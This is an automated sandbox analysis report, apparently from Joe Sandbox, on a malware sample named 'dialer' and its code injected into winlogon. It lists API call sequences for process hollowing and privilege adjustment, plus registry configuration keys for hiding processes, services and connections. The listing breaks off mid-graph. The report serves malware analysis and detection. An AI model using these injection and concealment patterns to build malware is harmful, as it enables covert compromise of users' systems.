                                                              • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                              Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                                                              APIs
                                                                • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                                • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                                • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                                • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                                • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                                • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                                • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                                • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                                • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                                • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                                • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                                • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                                • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                                • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                                • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                                • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                              • ExitProcess.KERNEL32 ref: 0000000140002263
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                              • String ID:
                                                              • API String ID: 3836936051-0
                                                              • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                              • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                              • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                              • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                              Non-executed Functions

                                                              Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                              • String ID: SOFTWARE$dialerstager$open
                                                              • API String ID: 3276259517-3931493855
                                                              • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                              • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                              • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                              • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                              Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303 303->289
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                              • String ID: @
                                                              • API String ID: 3462610200-2766056989
                                                              • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                              • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                              • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                              • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                              Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                              • String ID: dialersvc64
                                                              • API String ID: 4184240511-3881820561
                                                              • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                              • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                              • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                              • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                              Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: Delete$CloseEnumOpen
                                                              • String ID: SOFTWARE\dialerconfig
                                                              • API String ID: 3013565938-461861421
                                                              • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                              • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                              • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                              • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                              Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: File$Write$CloseCreateHandle
                                                              • String ID: \\.\pipe\dialercontrol_redirect64
                                                              • API String ID: 148219782-3440882674
                                                              • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                              • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                              • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                              • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                              Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.1774838193.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000019.00000002.1774805532.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774869042.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000019.00000002.1774907907.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProc
                                                              • String ID: ntdll.dll
                                                              • API String ID: 1646373207-2227199552
                                                              • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                              • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                              • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                              • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                              Execution Graph

                                                              Execution Coverage:1%
                                                              Dynamic/Decrypted Code Coverage:94.6%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:112
                                                              Total number of Limit Nodes:18
                                                              execution_graph 29685 225dc67273c 29686 225dc67276a 29685->29686 29687 225dc6727c5 VirtualAlloc 29686->29687 29688 225dc6727ec 29686->29688 29687->29688 29689 225dc643ab9 29690 225dc643a06 29689->29690 29691 225dc643a56 VirtualQuery 29690->29691 29692 225dc643a8a VirtualAlloc 29690->29692 29694 225dc643a70 29690->29694 29691->29690 29691->29694 29693 225dc643abb GetLastError 29692->29693 29692->29694 29693->29690 29693->29694 29695 225dc641abc 29700 225dc641628 GetProcessHeap 29695->29700 29697 225dc641ad2 Sleep SleepEx 29698 225dc641acb 29697->29698 29698->29697 29699 225dc641598 StrCmpIW StrCmpW 29698->29699 29699->29698 29701 225dc641648 __std_exception_copy 29700->29701 29745 225dc641268 GetProcessHeap 29701->29745 29703 225dc641650 29704 225dc641268 2 API calls 29703->29704 29705 225dc641661 29704->29705 29706 225dc641268 2 API calls 29705->29706 29707 225dc64166a 29706->29707 29708 225dc641268 2 API calls 29707->29708 29709 225dc641673 29708->29709 29710 225dc64168e RegOpenKeyExW 29709->29710 29711 225dc6418a6 29710->29711 29712 225dc6416c0 RegOpenKeyExW 29710->29712 29711->29698 29713 225dc6416e9 29712->29713 29714 225dc6416ff RegOpenKeyExW 29712->29714 29756 225dc6412bc 13 API calls __std_exception_copy 29713->29756 29715 225dc64173a RegOpenKeyExW 29714->29715 29716 225dc641723 29714->29716 29719 225dc641775 RegOpenKeyExW 29715->29719 29720 225dc64175e 29715->29720 29749 225dc64104c RegQueryInfoKeyW 29716->29749 29724 225dc641799 29719->29724 29725 225dc6417b0 RegOpenKeyExW 29719->29725 29757 225dc6412bc 13 API calls __std_exception_copy 29720->29757 29721 225dc6416f5 RegCloseKey 29721->29714 29758 225dc6412bc 13 API calls __std_exception_copy 29724->29758 29728 225dc6417eb RegOpenKeyExW 29725->29728 29729 225dc6417d4 29725->29729 29726 225dc64176b RegCloseKey 29726->29719 29730 225dc641826 RegOpenKeyExW 29728->29730 29731 225dc64180f 29728->29731 29759 225dc6412bc 13 API calls __std_exception_copy 29729->29759 29735 225dc64184a 29730->29735 29736 225dc641861 RegOpenKeyExW 29730->29736 29734 225dc64104c 5 API calls 29731->29734 29732 225dc6417a6 RegCloseKey 29732->29725 29738 225dc64181c RegCloseKey 29734->29738 29739 225dc64104c 5 API calls 29735->29739 29740 225dc64189c RegCloseKey 29736->29740 29741 225dc641885 29736->29741 29737 225dc6417e1 RegCloseKey 29737->29728 29738->29730 29742 225dc641857 RegCloseKey 29739->29742 29740->29711 29743 225dc64104c 5 API calls 29741->29743 29742->29736 29744 225dc641892 RegCloseKey 29743->29744 29744->29740 29760 225dc656168 29745->29760 29747 225dc641283 GetProcessHeap 29748 225dc6412ae __std_exception_copy 29747->29748 29748->29703 29750 225dc6411b5 RegCloseKey 29749->29750 29751 225dc6410bf 29749->29751 29750->29715 29751->29750 29752 225dc6410cf RegEnumValueW 29751->29752 29754 225dc641125 __std_exception_copy 29752->29754 29753 225dc64114e GetProcessHeap 29753->29754 29754->29750 29754->29752 29754->29753 29755 225dc64116e GetProcessHeap HeapFree 29754->29755 29755->29754 29756->29721 29757->29726 29758->29732 29759->29737 29761 225dc61273c 29762 225dc61276a 29761->29762 29763 225dc6127c5 VirtualAlloc 29762->29763 29766 225dc6128d4 29762->29766 29765 225dc6127ec 29763->29765 29763->29766 29764 225dc612858 LoadLibraryA 29764->29765 29765->29764 29765->29766 29767 225dc6428c8 29769 225dc64290e 29767->29769 29768 225dc642970 29769->29768 29771 225dc643844 29769->29771 29772 225dc643866 29771->29772 29773 225dc643851 StrCmpNIW 29771->29773 29772->29769 29773->29772 29774 225dc64554d 29776 225dc645554 29774->29776 29775 225dc6455bb 29776->29775 29777 225dc645637 VirtualProtect 29776->29777 29778 225dc645671 29777->29778 29779 225dc645663 GetLastError 29777->29779 29779->29778 29780 225dc6ad6cc 29785 225dc6ad6dd __free_lconv_num 29780->29785 29781 225dc6ad72e 29786 225dc6ad6ac 6 API calls __free_lconv_num 29781->29786 29782 225dc6ad712 HeapAlloc 29783 225dc6ad72c 29782->29783 29782->29785 29785->29781 29785->29782 29786->29783 29787 225dc645cf0 29788 225dc645cfd 29787->29788 29789 225dc645d09 29788->29789 29795 225dc645e1a 29788->29795 29790 225dc645d3e 29789->29790 29791 225dc645d8d 29789->29791 29792 225dc645d66 SetThreadContext 29790->29792 29792->29791 29793 225dc645e41 VirtualProtect FlushInstructionCache 29793->29795 29794 225dc645efe 29796 225dc645f1e 29794->29796 29809 225dc6443e0 VirtualFree 29794->29809 29795->29793 29795->29794 29805 225dc644df0 GetCurrentProcess 29796->29805 29798 225dc645f23 29800 225dc645f77 29798->29800 29801 225dc645f37 ResumeThread 29798->29801 29810 225dc647940 IsProcessorFeaturePresent RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind capture_previous_context 29800->29810 29802 225dc645f6b 29801->29802 29802->29798 29804 225dc645fbf 29806 225dc644e0c 29805->29806 29807 225dc644e22 VirtualProtect FlushInstructionCache 29806->29807 29808 225dc644e53 29806->29808 29807->29806 29808->29798 29809->29796 29810->29804

                                                              Executed Functions

                                                              Function 00000225DC641628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                              • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                              • API String ID: 106492572-2879589442
                                                              • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction ID: 406a7c028b3c229bdc1c75f8301e19e1701b13e4dfdd540bc7c265abecc9bc67
                                                              • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                              • Instruction Fuzzy Hash: 47712D7E328E60A6EB109FA9E85869D33B4F784F9AF509111DE4E47B69EF34C444C740
                                                              Function 00000225DC643790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: CurrentProcessProtectVirtual$HandleModule
                                                              • String ID: wr
                                                              • API String ID: 1092925422-2678910430
                                                              • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction ID: 5b5ece5b16f05410ef88fc7334ca4b30fcb2165cfe8f9a178b0778bd0effcbe9
                                                              • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                              • Instruction Fuzzy Hash: 96118B2A318F5493EF549BA9E408269B2A0FB88F86F148038DF8A03B94EF3DC505C704
                                                              Function 00000225DC645B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 59 225dc645b30-225dc645b57 60 225dc645b59-225dc645b68 59->60 61 225dc645b6b-225dc645b76 GetCurrentThreadId 59->61 60->61 62 225dc645b78-225dc645b7d 61->62 63 225dc645b82-225dc645b89 61->63 64 225dc645faf-225dc645fc6 call 225dc647940 62->64 65 225dc645b9b-225dc645baf 63->65 66 225dc645b8b-225dc645b96 call 225dc645960 63->66 69 225dc645bbe-225dc645bc4 65->69 66->64 72 225dc645bca-225dc645bd3 69->72 73 225dc645c95-225dc645cb6 69->73 75 225dc645c1a-225dc645c8d call 225dc644510 call 225dc6444b0 call 225dc644470 72->75 76 225dc645bd5-225dc645c18 call 225dc6485c0 72->76 78 225dc645cbc-225dc645cdc GetThreadContext 73->78 79 225dc645e1f-225dc645e30 call 225dc6474bf 73->79 87 225dc645c90 75->87 76->87 83 225dc645e1a 78->83 84 225dc645ce2-225dc645d03 78->84 90 225dc645e35-225dc645e3b 79->90 83->79 84->83 93 225dc645d09-225dc645d12 84->93 87->69 94 225dc645e41-225dc645e98 VirtualProtect FlushInstructionCache 90->94 95 225dc645efe-225dc645f0e 90->95 97 225dc645d92-225dc645da3 93->97 98 225dc645d14-225dc645d25 93->98 101 225dc645ec9-225dc645ef9 call 225dc6478ac 94->101 102 225dc645e9a-225dc645ea4 94->102 106 225dc645f1e-225dc645f2a call 225dc644df0 95->106 107 225dc645f10-225dc645f17 95->107 103 225dc645e15 97->103 104 225dc645da5-225dc645dc3 97->104 99 225dc645d27-225dc645d3c 98->99 100 225dc645d8d 98->100 99->100 108 225dc645d3e-225dc645d88 call 225dc643970 SetThreadContext 99->108 100->103 101->90 102->101 109 225dc645ea6-225dc645ec1 call 225dc644390 102->109 104->103 110 225dc645dc5-225dc645e10 call 225dc643900 call 225dc6474dd 104->110 120 225dc645f2f-225dc645f35 106->120 107->106 112 225dc645f19 call 225dc6443e0 107->112 108->100 109->101 110->103 112->106 124 225dc645f77-225dc645f95 120->124 125 225dc645f37-225dc645f75 ResumeThread call 225dc6478ac 120->125 128 225dc645fa9 124->128 129 225dc645f97-225dc645fa6 124->129 125->120 128->64 129->128
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000001E.00000002.3070825749.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_30_2_225dc640000_winlogon.jbxd
                                                              Similarity
                                                              • API ID: Thread$Current$Context
                                                              • String ID:
                                                              • API String ID: 1666949209-0
                                                              • Opcode ID: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                              • Instruction ID: f245da02ec037058e9828f5728e6f8f7909b60f63258dcba4de34453af5a61e8
                                                              • Opcode Fuzzy Hash: 1583aff86c60747e20c7fd7e292354d5b69db1aa669fd640e36c9be7a05cd15b
                                                              • Instruction Fuzzy Hash: B9D1997A20CF9896DA70DB4AE49835A7BA0F7C8B85F104156EACE47BA5DF3CC541CB40
                                                              Function 00000225DC6450D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 131 225dc6450d0-225dc6450fc 132 225dc64510d-225dc645116 131->132 133 225dc6450fe-225dc645106 131->133 134 225dc645127-225dc645130 132->134 135 225dc645118-225dc645120 132->135 133->132 136 225dc645141-225dc64514a 134->136 137 225dc645132-225dc64513a 134->137 135->134 138 225dc64514c-225dc645151 136->138 139 225dc645156-225dc645161 GetCurrentThreadId 136->139 137->136 140 225dc6456d3-225dc6456da 138->140 141 225dc645163-225dc645168 139->141 142 225dc64516d-225dc645174 139->142 141->140 143 225dc645176-225dc64517c 142->143 144 225dc645181-225dc64518a 142->144 143->140 145 225dc64518c-225dc645191 144->145 146 225dc645196-225dc6451a2 144->146 145->140 147 225dc6451a4-225dc6451c9 146->147 148 225dc6451ce-225dc645225 call 225dc6456e0 * 2 146->148 147->140 153 225dc64523a-225dc645243 148->153 154 225dc645227-225dc64522e 148->154 157 225dc645255-225dc64525e 153->157 158 225dc645245-225dc645252 153->158 155 225dc645236 154->155 156 225dc645230 154->156 155->153 162 225dc6452a6-225dc6452aa 155->162 161 225dc6452b0-225dc6452b6 156->161 159 225dc645273-225dc645298 call 225dc647870 157->159 160 225dc645260-225dc645270 157->160 158->157 170 225dc64532d-225dc645342 call 225dc643cc0 159->170 171 225dc64529e 159->171 160->159 164 225dc6452e5-225dc6452eb 161->164 165 225dc6452b8-225dc6452d4 call 225dc644390 161->165 162->161 168 225dc645315-225dc645328 164->168 169 225dc6452ed-225dc64530c call 225dc6478ac 164->169 165->164 175 225dc6452d6-225dc6452de 165->175 168->140 169->168 178 225dc645351-225dc64535a 170->178 179 225dc645344-225dc64534c 170->179 171->162 175->164 180 225dc64536c-225dc6453ba call 225dc648c60 178->180 181 225dc64535c-225dc645369 178->181 179->162 184 225dc6453c2-225dc6453ca 180->184 181->180 185 225dc6454d7-225dc6454df 184->185 186 225dc6453d0-225dc6454bb call 225dc647440 184->186 187 225dc6454e1-225dc6454f4 call 225dc644590 185->187 188 225dc645523-225dc64552b 185->188 198 225dc6454bd 186->198 199 225dc6454bf-225dc6454ce call 225dc644060 186->199 200 225dc6454f6 187->200 201 225dc6454f8-225dc645521 187->201 191 225dc645537-225dc645546 188->191 192 225dc64552d-225dc645535 188->192 196 225dc645548 191->196 